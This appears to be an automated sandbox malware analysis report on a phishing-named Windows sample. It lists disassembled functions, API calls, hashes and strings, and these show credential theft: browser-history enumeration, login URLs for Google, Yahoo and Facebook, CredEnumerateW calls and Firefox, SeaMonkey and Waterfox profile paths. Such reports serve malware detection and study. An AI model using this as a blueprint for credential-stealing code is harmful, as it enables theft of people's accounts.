                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                              • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                              • API String ID: 2941347001-70141382
                                                              • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                              • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                              • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                              • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48

                                                              Control-flow Graph

                                                              APIs
                                                              • memset.MSVCRT ref: 0040C298
                                                                • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                              • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                              • wcschr.MSVCRT ref: 0040C324
                                                              • wcschr.MSVCRT ref: 0040C344
                                                              • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                              • GetLastError.KERNEL32 ref: 0040C373
                                                              • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                              • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
                                                              • String ID: visited:
                                                              • API String ID: 2470578098-1702587658
                                                              • Opcode ID: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
                                                              • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                              • Opcode Fuzzy Hash: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
                                                              • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 721 40e175-40e1a1 call 40695d call 406b90 726 40e1a7-40e1e5 memset 721->726 727 40e299-40e2a8 call 4069a3 721->727 729 40e1e8-40e1fa call 406e8f 726->729 733 40e270-40e27d call 406b53 729->733 734 40e1fc-40e219 call 40dd50 * 2 729->734 733->729 739 40e283-40e286 733->739 734->733 745 40e21b-40e21d 734->745 742 40e291-40e294 call 40aa04 739->742 743 40e288-40e290 free 739->743 742->727 743->742 745->733 746 40e21f-40e235 call 40742e 745->746 746->733 749 40e237-40e242 call 40aae3 746->749 749->733 752 40e244-40e26b _snwprintf call 40a8d0 749->752 752->733
                                                              APIs
                                                                • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                              • memset.MSVCRT ref: 0040E1BD
                                                                • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                              • free.MSVCRT ref: 0040E28B
                                                                • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                              • _snwprintf.MSVCRT ref: 0040E257
                                                                • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                              • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                              • API String ID: 2804212203-2982631422
                                                              • Opcode ID: 1336a280070a4f27ef0c8ccd157a42e88156c8d5617ab228165dee6bd52a4842
                                                              • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                              • Opcode Fuzzy Hash: 1336a280070a4f27ef0c8ccd157a42e88156c8d5617ab228165dee6bd52a4842
                                                              • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                              • memset.MSVCRT ref: 0040BC75
                                                              • memset.MSVCRT ref: 0040BC8C
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,Function_0004E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                              • memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE), ref: 0040BCD6
                                                              • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                              • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                              • String ID:
                                                              • API String ID: 115830560-3916222277
                                                              • Opcode ID: 4ebf604db45489440b0c8485e844b7deffc41ff7e568ae10611abfa3d316197e
                                                              • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                              • Opcode Fuzzy Hash: 4ebf604db45489440b0c8485e844b7deffc41ff7e568ae10611abfa3d316197e
                                                              • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 822 41837f-4183bf 823 4183c1-4183cc call 418197 822->823 824 4183dc-4183ec call 418160 822->824 829 4183d2-4183d8 823->829 830 418517-41851d 823->830 831 4183f6-41840b 824->831 832 4183ee-4183f1 824->832 829->824 833 418417-418423 831->833 834 41840d-418415 831->834 832->830 835 418427-418442 call 41739b 833->835 834->835 838 418444-41845d CreateFileW 835->838 839 41845f-418475 CreateFileA 835->839 840 418477-41847c 838->840 839->840 841 4184c2-4184c7 840->841 842 41847e-418495 GetLastError free 840->842 845 4184d5-418501 memset call 418758 841->845 846 4184c9-4184d3 841->846 843 4184b5-4184c0 call 444706 842->843 844 418497-4184b3 call 41837f 842->844 843->830 844->830 850 418506-418515 free 845->850 846->845 850->830
                                                              APIs
                                                              • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                              • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                                              • GetLastError.KERNEL32 ref: 0041847E
                                                              • free.MSVCRT ref: 0041848B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: CreateFile$ErrorLastfree
                                                              • String ID: |A
                                                              • API String ID: 77810686-1717621600
                                                              • Opcode ID: b9220c8ee9235e77546fc7e578fe859ac5c7910c95b4d012992e052ab282d142
                                                              • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                              • Opcode Fuzzy Hash: b9220c8ee9235e77546fc7e578fe859ac5c7910c95b4d012992e052ab282d142
                                                              • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96

                                                              Control-flow Graph

                                                              APIs
                                                              • memset.MSVCRT ref: 0041249C
                                                              • ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
                                                              • ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
                                                              • GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
                                                              • LoadIconW.USER32(00000000,00000065), ref: 0041258B
                                                              • wcscpy.MSVCRT ref: 004125A0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                              • String ID: r!A
                                                              • API String ID: 2791114272-628097481
                                                              • Opcode ID: c924fcd7ecfcbdf661535418ab9e4f477d4ea067639620652b406838daccced0
                                                              • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                              • Opcode Fuzzy Hash: c924fcd7ecfcbdf661535418ab9e4f477d4ea067639620652b406838daccced0
                                                              • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                              APIs
                                                                • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                              • _wcslwr.MSVCRT ref: 0040C817
                                                                • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                              • wcslen.MSVCRT ref: 0040C82C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                              • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                              • API String ID: 2936932814-4196376884
                                                              • Opcode ID: b881829d82f0d8b9654aa99a04529af2f3c2152f6b010e5444e3d03ead400705
                                                              • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                              • Opcode Fuzzy Hash: b881829d82f0d8b9654aa99a04529af2f3c2152f6b010e5444e3d03ead400705
                                                              • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                              APIs
                                                              • memset.MSVCRT ref: 0040A824
                                                              • GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                              • wcscpy.MSVCRT ref: 0040A854
                                                              • wcscat.MSVCRT ref: 0040A86A
                                                              • LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                              • LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                              • String ID: C:\Windows\system32
                                                              • API String ID: 669240632-2896066436
                                                              • Opcode ID: 808217d469f29374b6c53add07773bde8ba425e7a3f83fd710eb9a2b8acfca27
                                                              • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                              • Opcode Fuzzy Hash: 808217d469f29374b6c53add07773bde8ba425e7a3f83fd710eb9a2b8acfca27
                                                              • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                              APIs
                                                                • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                              • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                              • wcslen.MSVCRT ref: 0040BE06
                                                              • wcsncmp.MSVCRT ref: 0040BE38
                                                              • memset.MSVCRT ref: 0040BE91
                                                              • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                              • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                              • wcschr.MSVCRT ref: 0040BF24
                                                              • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$CredEnumerateFreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                              • String ID:
                                                              • API String ID: 697348961-0
                                                              • Opcode ID: 33cbc3fbfef4114ffc04ab79ab4e472c1ca1484598d0cfc67a802b423a316e07
                                                              • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                              • Opcode Fuzzy Hash: 33cbc3fbfef4114ffc04ab79ab4e472c1ca1484598d0cfc67a802b423a316e07
                                                              • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                              APIs
                                                              • memset.MSVCRT ref: 00403CBF
                                                              • memset.MSVCRT ref: 00403CD4
                                                              • memset.MSVCRT ref: 00403CE9
                                                              • memset.MSVCRT ref: 00403CFE
                                                              • memset.MSVCRT ref: 00403D13
                                                                • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                              • memset.MSVCRT ref: 00403DDA
                                                                • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                              • String ID: Waterfox$Waterfox\Profiles
                                                              • API String ID: 4039892925-11920434
                                                              • Opcode ID: 74213e66932f07ea3ad059af1798c87c438cc92db4e0e7cdb609a7dadd567ada
                                                              • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                              • Opcode Fuzzy Hash: 74213e66932f07ea3ad059af1798c87c438cc92db4e0e7cdb609a7dadd567ada
                                                              • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                              APIs
                                                              • memset.MSVCRT ref: 00403E50
                                                              • memset.MSVCRT ref: 00403E65
                                                              • memset.MSVCRT ref: 00403E7A
                                                              • memset.MSVCRT ref: 00403E8F
                                                              • memset.MSVCRT ref: 00403EA4
                                                                • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                              • memset.MSVCRT ref: 00403F6B
                                                                • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                              • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                              • API String ID: 4039892925-2068335096
                                                              • Opcode ID: fb8d06a7ed3fa35f71d99b938417e45633d605fe1ac21657eef3450a4ac41d2d
                                                              • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                              • Opcode Fuzzy Hash: fb8d06a7ed3fa35f71d99b938417e45633d605fe1ac21657eef3450a4ac41d2d
                                                              • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                              APIs
                                                              • memset.MSVCRT ref: 00403FE1
                                                              • memset.MSVCRT ref: 00403FF6
                                                              • memset.MSVCRT ref: 0040400B
                                                              • memset.MSVCRT ref: 00404020
                                                              • memset.MSVCRT ref: 00404035
                                                                • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                              • memset.MSVCRT ref: 004040FC
                                                                • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                              • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                              • API String ID: 4039892925-3369679110
                                                              • Opcode ID: a800c2c864e82bb525ebc7d4b700ce70e1897f56eef446e490fc18a40a012dd3
                                                              • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                              • Opcode Fuzzy Hash: a800c2c864e82bb525ebc7d4b700ce70e1897f56eef446e490fc18a40a012dd3
                                                              • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                              APIs
                                                              • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
